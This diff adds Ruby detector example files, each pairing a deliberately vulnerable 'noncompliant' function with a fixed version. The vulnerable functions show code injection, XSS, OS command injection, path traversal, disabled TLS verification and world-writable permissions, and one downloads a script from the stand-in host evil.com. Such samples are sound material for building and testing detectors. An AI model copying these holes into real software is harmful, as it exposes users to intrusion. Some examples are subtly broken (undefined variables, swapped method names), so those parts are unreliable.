Adding Ruby Rules Code Examples

src/ruby/detectors/code-injection/code-injection.rb

@@ -0,0 +1,20 @@
+=begin
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+def code_injection_noncompliant()
+  code = params[:code]
+  # Noncompliant: User input is not sanitized.
+  @result = User.send(code)
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+def code_injection_compliant()
+  method = params[:method] == 1 ? :method_a : :method_b
+  # Compliant: User input is not passed in User.send().
+  @result = User.send(method, *args)
+end
+# {/fact}

src/ruby/detectors/cross-site-request-forgery/cross-site-request-forgery.rb

@@ -0,0 +1,24 @@
+=begin
+ Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+ SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+def cross_site_request_forgery_noncompliant
+  user = params[:user_id]
+  users_service_domain = params[:users_service_domain]
+  # Noncompliant: Complete URL is user-controlled.
+  response = Excon.post("#{users_service_domain}/logins", body: {user_id: user}).body
+  token = JSON.parse(response)["token"]
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+def cross_site_request_forgery_compliant
+  user = params[:user_id]
+  users_service_path = params[:users_service_path]
+  # Compliant: Only suffix of the URL is controlled by user.
+  response = Excon.post("users-service/#{users_service_path}", body: {user_id: user}).body
+  token = JSON.parse(response)["token"]
+end
+# {/fact}

src/ruby/detectors/cross-site-scripting/cross-site-scripting.rb

@@ -0,0 +1,20 @@
+=begin
+ Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+ SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+def crosssite_scripting_noncompliant
+  name = params[":name"]
+  # Noncompliant: The parameter is not escaped.
+  "<h2>#{name}</h2>".html_safe
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+def crosssite_scripting_compliant
+  name = params[":name"]
+  # Compliant: Parameter is escaped.
+  "<h2>#{ERB::Util.html_escape(name)}</h2>".html_safe
+end
+# {/fact}

src/ruby/detectors/divide_by_zero/divide_by_zero.rb

@@ -0,0 +1,20 @@
+#  Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+#  SPDX-License-Identifier: Apache-2.0
+
+
+# {fact [email protected] defects=1}
+def divide_by_zero_noncompliant
+  zero = 0
+  # Noncompliant: divide by zero 
+  bad = variable/zero
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+def divide_by_zero_compliant
+  # Compliant: check before dividing 
+  if zero != 0
+    variable / zero
+  end
+end
+# {/fact}

src/ruby/detectors/http-to-file-access/http-to-file-access.rb

@@ -0,0 +1,32 @@
+=begin
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0
+=end
+
+require "net/http"
+
+class ExampleController < ActionController::Base
+
+  # {fact [email protected] defects=1}
+  def http_file_access_noncompliant
+    resp = Net::HTTP.new("evil.com").get("/script").body
+    file = File.open("/tmp/script", "w")
+
+    # Noncompliant: Writing a file from http access.
+    file.write(resp) 
+  end
+  # {/fact}
+
+
+  # {fact [email protected] defects=0}
+  def http_file_access_compliant
+    a = "a"
+    file = File.open("/tmp/script", "w")
+
+    # Compliant: Not using any http access to write in file.
+    file.write(a) 
+
+  end
+  # {/fact}
+
+end

src/ruby/detectors/improper-certificate-validation/improper-certificate-validation.rb

@@ -0,0 +1,26 @@
+=begin
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+require "httparty"
+
+def certificate_validation_noncompliant
+
+  # Noncompliant: SSL certificate validation is disabled.
+  HTTParty.get("http://example.com/", verify: false)
+
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+require "httparty"
+
+def certificate_validation_compliant
+
+  # Compliant: SSL certificate validation is enabled.
+  HTTParty.get("http://example.com/", verify: true)
+
+end
+# {/fact}

src/ruby/detectors/improper-input-validation/improper-input-validation-compliant.rb

@@ -0,0 +1,11 @@
+=begin
+ Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+ SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=0}
+class InputValidation
+  # Compliant: Properly bounded regex passed to validates.
+  validates_format_of :good_valid, :with => /\A[a-zA-Z]\z/
+end
+# {/fact}

src/ruby/detectors/improper-input-validation/improper-input-validation-noncompliant.rb

@@ -0,0 +1,13 @@
+=begin
+ Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+ SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+class InputValidation
+  # Noncompliant: Improperly bounded regex passed to validates.
+  validates :username, :length => 6..20, :format => /([a-z][0-9])+/i
+
+  accepts_nested_attributes_for :author, :pages
+end
+# {/fact}

src/ruby/detectors/insecure-cryptography/insecure-cryptography.rb

@@ -0,0 +1,20 @@
+=begin
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+require 'openssl'
+
+def cryptography_noncompliant()
+  # Noncompliant: weak block mode
+  OpenSSL::Cipher::AES.new(128, :ecb)
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+def cryptography_compliant()
+  # Compliant: strong encryption algorithm
+  OpenSSL::Cipher::AES.new(128, :gcm)
+end
+# {/fact}

src/ruby/detectors/insufficiently-protected-credentials/insufficiently-protected-credentials.rb

@@ -0,0 +1,24 @@
+=begin
+ Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+ SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+require 'jwt'
+
+def insufficiently_protected_credentials_noncompliant(hmac_secret)
+  # Noncompliant: JWT password is hardcoded in payload.
+  payload = { data: 'data', password: 12345 }
+  token = JWT.encode payload, hmac_secret, 'HS256'
+  puts token
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+def insufficiently_protected_credentials_compliant(hmac_secret)
+  # Compliant: JWT password is not hardcoded.
+  payload = { data: 'data', nbf: nbf }
+  token = JWT.encode payload, hmac_secret, 'HS256'
+  puts token
+end
+# {/fact}

src/ruby/detectors/log-injection/log-injection.rb

@@ -0,0 +1,40 @@
+=begin
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0
+=end
+
+require 'logger'
+
+class UsersController < ApplicationController
+  include ERB::Util
+
+  def init_logger
+    if @logger == nil
+      @logger = Logger.new STDOUT
+    end
+  end
+
+# {fact [email protected] defects=1}
+  def log_params_noncompliant
+    init_logger
+
+    unsanitized = params[:foo]
+    # Noncompliant: Unsanitized user-input is used in logger
+    @logger.error "input: " + unsanitized 
+  end
+# {/fact}
+
+
+# {fact [email protected] defects=0}
+  def log_params_compliant
+    init_logger
+
+    unsanitized = params[:foo]
+
+    sanitized = unsanitized.gsub("\n", "")
+    # Compliant: Sanitized user-input is used in logger
+    @logger.warn "input: " + sanitized 
+  end
+# {/fact}
+
+end

src/ruby/detectors/loose-file-permissions/loose-file-permissions.rb

@@ -0,0 +1,22 @@
+=begin
+ Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+ SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+require "fileutils"
+
+def open_file_permission_noncompliant(filename)
+
+  # Noncompliant: sets file world writable.
+  FileUtils.chmod 0222, filename
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+def open_file_permission_compliant(filename)
+
+  # Compliant: restricts group/world access.
+  FileUtils.chmod 0700, filename
+end
+# {/fact}

src/ruby/detectors/missing-pagination/missing-pagination.rb

@@ -0,0 +1,23 @@
+=begin
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+def missing_pagination_noncompliant
+  s3 = Aws::S3::Client.new
+  # Noncompliant: Missing pagination
+  response = s3.list_objects(bucket:'your-bucket-name')
+  puts response.contents.map(&:key)
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+def missing_pagination_compliant
+  s3 = Aws::S3::Client.new
+  # Compliant: Pagination used correctly
+  s3.list_objects(bucket:'your-bucket-name').each do |response|
+    puts response.contents.map(&:key)
+  end
+end
+# {/fact}

src/ruby/detectors/os-command-injection/os-command-injection-compliant.rb

@@ -0,0 +1,17 @@
+=begin
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=0}
+require "shellwords"
+
+class UsersController < ActionController::Base
+  def oscommand_injection_noncompliant
+    cmd = params[:cmd]
+    safe_cmd = Shellwords.escape(cmd)
+    # Compliant: User data has been escaped
+    system(safe_cmd)
+  end
+end
+# {/fact}

src/ruby/detectors/os-command-injection/os-command-injection-noncompliant.rb

@@ -0,0 +1,14 @@
+=begin
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+class UsersController < ActionController::Base
+  def oscommand_injection_compliant
+    cmd = params[:cmd]
+    # Noncompliant: User data used directly as a command without escaping
+    system(cmd)
+   end
+end
+# {/fact}

src/ruby/detectors/path-traversal/path-traversal.rb

@@ -0,0 +1,20 @@
+=begin
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+def render_modern_param_noncompliant
+    page = params[:page]
+    # Noncompliant: Unsanitized user-input is used in render file.
+    render file: "/some/path/#{page}"
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+def render_modern_param_compliant
+    page = params[:page]
+    # Compliant: User-input is sanitized before using it in render file.
+    render file: File.basename("/some/path/#{page}")
+end
+# {/fact}

src/ruby/detectors/resource-leak/resource-leak.rb

@@ -0,0 +1,24 @@
+=begin
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0
+=end
+
+# {fact [email protected] defects=1}
+def file_reading_noncompliant(filename)
+  # Noncompliant: File hasn't been closed
+  file = File.open(filename, 'r')
+  contents = file.read
+  puts contents
+end
+# {/fact}
+
+# {fact [email protected] defects=0}
+def file_reading_compliant(filename)
+  # Compliant: File has been closed after read
+  File.open(filename, 'r') do |file|
+    file.each_line do |line|
+      puts line
+    end
+  end
+end
+# {/fact}